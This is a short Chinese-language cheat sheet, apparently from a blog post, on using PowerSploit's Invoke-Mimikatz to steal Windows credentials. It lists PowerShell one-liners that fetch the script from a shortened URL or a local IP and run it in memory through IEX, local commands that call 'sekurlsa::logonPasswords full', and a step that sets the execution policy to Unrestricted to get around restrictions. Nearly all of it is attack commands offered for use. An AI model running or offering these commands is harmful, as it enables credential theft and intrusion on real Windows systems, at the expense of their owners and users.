https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
(2)具备网络环境直接执行命令
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
(3)本地网络环境
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/');Invoke-Mimikatz -DumpCreds"
(4)下载本地执行
一句话执行:
powershell Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'
有授权限制的:
Get-ExecutionPolicy //结果显示restricted
Set-ExecutionPolicy Unrestricted //打开限制
Import-Module .\Invoke-Mimikatz.ps1 //导入命令
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"' //获取密码
原文地址:http://blog.51cto.com/simeon/2126106